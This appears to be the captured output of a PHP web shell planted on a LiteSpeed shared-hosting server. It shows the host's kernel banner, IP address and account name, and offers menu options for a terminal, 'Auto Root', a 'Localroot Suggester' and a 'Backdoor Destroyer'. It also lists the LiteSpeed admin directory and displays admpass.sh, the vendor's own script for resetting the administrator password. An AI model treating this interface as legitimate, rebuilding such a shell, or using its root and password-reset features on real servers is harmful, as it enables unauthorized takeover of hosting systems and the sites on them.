Linux sagir-us1.hostever.us 5.14.0-570.51.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 8 09:41:34 EDT 2025 x86_64
LiteSpeed
Server IP : 104.247.108.91 & Your IP : 216.73.216.105
Domains : 74 Domain
User : georgeto
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
lsws /
admin /
misc /
Delete
Unzip
Name
Size
Permission
Date
Action
admpass.sh
1.17
KB
-r-xr-xr-x
2025-02-25 04:01
build_admin_php.sh
7.93
KB
-r-xr-xr-x
2025-02-25 04:01
convertxml.php
502
B
-rw-r--r--
2025-02-25 04:01
convertxml.sh
679
B
-r-xr-xr-x
2025-02-25 04:01
create_admin_keypair.sh
334
B
-r-xr-xr-x
2025-02-25 04:01
enable_phpa.sh
4.42
KB
-r-xr-xr-x
2025-02-25 04:01
gdb-bt
28
B
-rw-r--r--
2025-02-25 04:01
genjCryptionKeyPair.php
6.42
KB
-rw-r--r--
2025-02-25 04:01
gzipStatic.sh
272
B
-r-xr-xr-x
2025-02-25 04:01
htpasswd.php
500
B
-rw-r--r--
2025-02-25 04:01
lscmctl
15.3
KB
-r-xr-xr-x
2025-02-25 04:01
lshttpd.service
653
B
-rw-r--r--
2025-02-25 04:01
lsup.sh
15.49
KB
-r-xr-xr-x
2025-02-25 04:01
lsws.rc
1.87
KB
-r-xr-xr-x
2025-02-25 04:01
lsws.rc.gentoo
447
B
-r-xr-xr-x
2025-02-25 04:01
php.ini
37.29
KB
-rw-r--r--
2025-02-25 04:01
rc-inst.sh
4.34
KB
-r-xr-xr-x
2025-02-25 04:01
rc-uninst.sh
2.19
KB
-r-xr-xr-x
2025-02-25 04:01
testbeta.sh
15.49
KB
-r-xr-xr-x
2025-02-25 04:01
uninstall.sh
3.05
KB
-r-xr-xr-x
2025-02-25 04:01
Save
Rename
#!/bin/sh CUR_DIR=`dirname "$0"` cd $CUR_DIR CUR_DIR=`pwd` SUCC=0 cat <<EOF Please specify the user name of administrator. This is the user name required to login the administration Web interface. EOF printf "%s" "User name [admin]: " read ADMIN_USER if [ "x$ADMIN_USER" = "x" ]; then ADMIN_USER=admin fi cat <<EOF Please specify the administrator's password. This is the password required to login the administration Web interface. EOF while [ $SUCC -eq "0" ]; do printf "%s" "Password: " stty -echo read PASS_ONE stty echo echo "" if [ `expr "$PASS_ONE" : '.*'` -ge 6 ]; then printf "%s" "Retype password: " stty -echo read PASS_TWO stty echo echo "" if [ "x$PASS_ONE" = "x$PASS_TWO" ]; then SUCC=1 else echo "" echo "[ERROR] Sorry, passwords does not match. Try again!" echo "" fi else echo "" echo "[ERROR] Sorry, password must be at least 6 charactors!" echo "" fi done # generate password file ENCRYPT_PASS=`$CUR_DIR/../fcgi-bin/admin_php -q $CUR_DIR/htpasswd.php $PASS_ONE` echo "$ADMIN_USER:$ENCRYPT_PASS" > $CUR_DIR/../conf/htpasswd if [ $? -eq 0 ]; then echo "Administrator's username/password is updated successfully!" fi